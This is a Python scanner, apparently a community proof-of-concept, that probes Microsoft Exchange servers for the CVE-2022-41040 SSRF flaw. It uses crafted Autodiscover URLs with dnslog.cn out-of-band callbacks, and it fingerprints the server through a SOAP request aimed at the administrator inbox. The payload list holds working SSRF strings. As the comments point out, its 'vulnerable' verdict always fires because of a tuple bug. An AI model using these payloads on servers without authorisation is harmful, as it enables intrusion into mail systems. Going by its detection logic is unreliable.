import requests
import subprocess
import re
class Dnslog():
    """Minimal client for the public dnslog.cn out-of-band DNS logging service.

    Both endpoints are contacted over plain HTTP with a 30 s timeout, through one
    ``requests`` session so the cookie issued by ``getdomain.php`` is reused by
    ``getrecords.php``.  No error handling is done here: a network failure or a
    non-2xx/non-JSON reply propagates to the caller as a ``requests`` exception
    (or ``ValueError`` from ``.json()``).

    Attributes:
        s: the ``requests.Session`` shared by both calls.
        domain: the callback domain handed out by dnslog.cn, taken verbatim from
            the response body (not trimmed or validated).
    """
    def __init__(self) -> None:
        self.s = requests.session()
        # The body of this reply is the callback domain later embedded in probe URLs.
        req = self.s.get("http://www.dnslog.cn/getdomain.php", timeout=30)
        self.domain = req.text
    def pull_logs(self):
        """Return the JSON-decoded record list for ``self.domain``.

        The caller (``run``) treats a non-empty result as evidence that something
        resolved a name under the callback domain.
        """
        req = self.s.get("http://www.dnslog.cn/getrecords.php", timeout=30)
        return req.json()
def getInfo(url: str) -> None:
    """Print server-identifying response headers from a POST to ``{url}/mapi/nspi``.

    The request body is a FindItem SOAP envelope; only the response *headers*
    are inspected.  For each entry of ``header_field`` the value of the named
    header is printed; a header that is absent raises ``KeyError`` on
    ``response.headers[v]``, which is caught, printed with the word 'error',
    and skipped.  Any failure of the request itself is caught and printed.

    Args:
        url: scheme + host of the target; '/mapi/nspi' is appended.

    Side effects: network request with TLS certificate verification disabled
    (``verify=False``), output to stdout only.
    """
    headers = {
        'Content-Type': 'text/xml',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
    }
    # NOTE: this is a non-raw literal, so the doubled backslashes mean the body
    # carries the literal six-character sequences \x0d\x0a (and \" around
    # "Exchange2016"), not CR/LF or plain quotes.  That makes the body a
    # distinctive artefact of this script's traffic rather than well-formed XML.
    data = '<?xml version=\'1.0\' encoding=\'utf-8\'?>\\x0d\\x0a <soap:Envelope\\x0d\\x0a xmlns:soap=\'http://schemas.xmlsoap.org/soap/envelope/\'\\x0d\\x0a xmlns:t=\'http://schemas.microsoft.com/exchange/services/2006/types\'\\x0d\\x0a xmlns:m=\'http://schemas.microsoft.com/exchange/services/2006/messages\'\\x0d\\x0a xmlns:xsi=\'http://www.w3.org/2001/XMLSchema-instance\'>\\x0d\\x0a <soap:Header>\\x0d\\x0a <t:RequestServerVersion Version=\\"Exchange2016\\" />\\x0d\\x0a </soap:Header>\\x0d\\x0a <soap:Body>\\x0d\\x0a <m:FindItem Traversal=\'Shallow\'>\\x0d\\x0a <m:ItemShape>\\x0d\\x0a <t:BaseShape>AllProperties</t:BaseShape>\\x0d\\x0a </m:ItemShape>\\x0d\\x0a <m:ParentFolderIds>\\x0d\\x0a <t:DistinguishedFolderId Id=\'inbox\'>\\x0d\\x0a <t:Mailbox>\\x0d\\x0a <t:EmailAddress>administrator@example.local</t:EmailAddress>\\x0d\\x0a </t:Mailbox>\\x0d\\x0a </t:DistinguishedFolderId>\\x0d\\x0a </m:ParentFolderIds>\\x0d\\x0a </m:FindItem>\\x0d\\x0a </soap:Body>\\x0d\\x0a </soap:Envelope>'
    # Printed label -> response header that is read for it.
    header_field = {'computerName': 'X-FEServer',
                    'backendname': 'X-CalculatedBETarget',
                    'Application': 'X-ServerApplication'}
    try:
        response = requests.post(f'{url}/mapi/nspi', headers=headers, data=data, verify=False)
        print('Get some info about your target...')
        for k, v in header_field.items():
            try:
                # response.headers is case-insensitive; a missing header raises KeyError.
                print(k + ": " + response.headers[v], 'good')
            except Exception as ee:
                print(str(ee), 'error')
                continue
    except Exception as e:
        print(str(e), 'error')
def run(sURL: str, domain: str) -> None:
    """Probe one host with the Autodiscover URL variants below and report a verdict.

    Each entry of ``payload_list`` is appended verbatim to ``sURL`` (entries
    start with '/') and fetched with TLS verification disabled.  After every
    200/302 reply the dnslog.cn record list is pulled; a non-empty list is
    reported as a CVE-2022-41040 hit and ends the loop.  Otherwise the header/
    body condition further down decides (see the note there).  When the loop
    breaks, ``getInfo(sURL)`` runs; when it completes without a break, the
    ``for``/``else`` branch prints a negative verdict and calls ``exit()``, so
    ``getInfo`` is never reached on a negative result.

    Args:
        sURL: scheme + host of the target, e.g. "https://test.com".
        domain: the target's mail domain; embedded as a label in the ``.vN.``
            callback names so a DNS-log hit can be tied to this target.

    Output goes to stdout only.  The second positional argument passed to
    ``print`` ('good' / 'error') is simply printed as a trailing word; it looks
    like the residue of a colourised logging helper — TODO confirm.
    """
    print(f"Target URL: {sURL}")
    print(f"IPv4 look up to domain: {domain}", 'good')
    headers = {
        # NOTE: the trailing token 'pp9520' is not part of any browser UA string;
        # it is a distinctive marker of requests sent by this script.
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 pp9520',
        'Accept': '*/*',
        'Accept-Language': 'en',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close'
    }
    # for dns checking: every probe embeds this dnslog.cn-issued host name so that
    # a server-side resolution of it becomes visible through pull_logs().
    # Dnslog() is constructed outside the try below, so a dnslog.cn outage
    # raises straight out of run().
    dns_callback = Dnslog()
    dns_callback_host = dns_callback.domain
    print(f"The test DNS server is '{dns_callback_host}'")
    # Probe URL variants, kept exactly as written.  Entries 12 and 13 and
    # entries 21-24 lack a separating comma, so Python joins each of those
    # groups into ONE string literal (implicit concatenation); the list
    # therefore has fewer elements than lines, and those joined entries are
    # sent as a single, very long path.
    payload_list = [
        f'/autodiscover/autodiscover.json/v1.0/aa@{dns_callback_host}?Protocol=Autodiscoverv1',
        f'/autodiscover/autodiscover.json/v1.0/aa..{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell',
        f'/autodiscover/autodiscover.json/v1.0/aa@{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell',
        f'/autodiscover/autodiscover.json?aa..{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
        f'/autodiscover/autodiscover.json?aa@{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
        f'/autodiscover/autodiscover.json?aa..{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
        f'/autodiscover/autodiscover.json?aa@{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
        f'/autodiscover/autodiscover.json?aa..{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
        f'/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell',
        "/autodiscover/autodiscover.json?@URL/&Email=autodiscover/autodiscover.json%3f@URL",
        f"/autodiscover/autodiscover.json?@{domain}/&Email=autodiscover/autodiscover.json%3f@{domain}",
        # no trailing comma: this literal and the next one form a single element
        f"/autodiscover/autodiscover.json?@evil.com/Powershell?=Email=autodiscover/autodiscover.json%3f@evil.com"
        f"/autodiscover/autodiscover.json?@{dns_callback_host}/&Email=autodiscover/autodiscover.json%3f@{dns_callback_host}",
        f"/autodiscover/autodiscover.json?@{domain}.v1.{dns_callback_host}/&Email=autodiscover/autodiscover.json%3f@{domain}.v1.{dns_callback_host}",
        f"/autodiscover/autodiscover.json/v1.0/aa@{domain}.v2.{dns_callback_host}?Protocol=Autodiscoverv1",
        f"/autodiscover/autodiscover.json/v1.0/aa..@{domain}.v3.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..@{domain}.v3.{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell",
        f"/autodiscover/autodiscover.json/v1.0/aa@{domain}.v4.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{domain}.v4.{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell",
        f"/autodiscover/autodiscover.json?aa..{domain}.v5.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..{domain}.v5.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v5.{dns_callback_host}Protocol=Powershell",
        f"/autodiscover/autodiscover.json?aa@{domain}.v6.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{domain}.v6.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v6.{dns_callback_host}Protocol=Powershell",
        f"/autodiscover/autodiscover.json?aa..{domain}.v7.{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{domain}.v7.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v7.{dns_callback_host}Protocol=Powershell",
        f"/autodiscover/autodiscover.json?aa@{domain}.v8.{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{domain}.v8.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v8.{dns_callback_host}Protocol=Powershell",
        # no trailing commas: the following four literals form a single element
        f"/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{domain}.v9.{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell"
        "/autodiscover/autodiscover.json?a@foo.var/owa/&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell"
        "/autodiscover/autodiscover.json?@1337.com/owa/?&Email=autodiscover/autodiscover.json%3F@1337.com"
    ]
    for payload in payload_list:
        url = sURL + payload
        try:
            # Certificate verification is disabled; requests will warn on each call.
            req = requests.get(url, headers=headers, verify=False)
            # The full response body is dumped to stdout before any verdict.
            print(req.text)
            if req.status_code == 200 or req.status_code == 302:
                print(f"GET request '{url}' success", 'good')
            else:
                print(f"GET request '{url}' failed", 'error')
                continue
            # Only reached for 200/302.  A non-empty record list is taken as the
            # target having resolved the callback name (out-of-band evidence).
            records = dns_callback.pull_logs()
            if len(records) == 0:
                pass
            else:
                print(f"The target {sURL} seems to be vuln by CVE-2022-41040", "good")
                print(f"payload: {payload}", 'good')
                break
            # NOTE: `(req.status_code == 200, 302)` is a two-element tuple, not a
            # membership test, and a non-empty tuple is always truthy — so this
            # whole condition is always True.  In practice the first 200/302
            # reply without a DNS record still prints the 'vulnerable' line and
            # breaks the loop; the else branch below is unreachable.  Treat this
            # verdict as an in-band hint only; the DNS log is the real evidence.
            if (dns_callback_host in req.headers) or (req.status_code == 200, 302) or ("IIS Web Core" in req.text) or ('X-FEServer' in req.headers):
                print('This site is vulnerable to SSRF Check your collabrator client.', 'good')
                break
            else:
                print('It seems not vulnerable, but check your collabrator client!', 'error')
        except Exception as e:
            # Request/JSON errors for one probe are printed and the loop moves on.
            print(str(e), 'error')
    else:
        # for/else: runs only when no probe broke out of the loop.  exit() is the
        # site-module builtin, so getInfo() below is skipped on a negative result.
        print(f"The target seems NOT vuln by CVE-2022-41040", "error")
        exit()
    getInfo(sURL)
if __name__ == '__main__':
    # Script entry point.  The target URL and mail domain are hard-coded
    # placeholders here; run() expects the base URL without a trailing slash
    # because each probe path begins with '/'.
    run("https://test.com","test.com")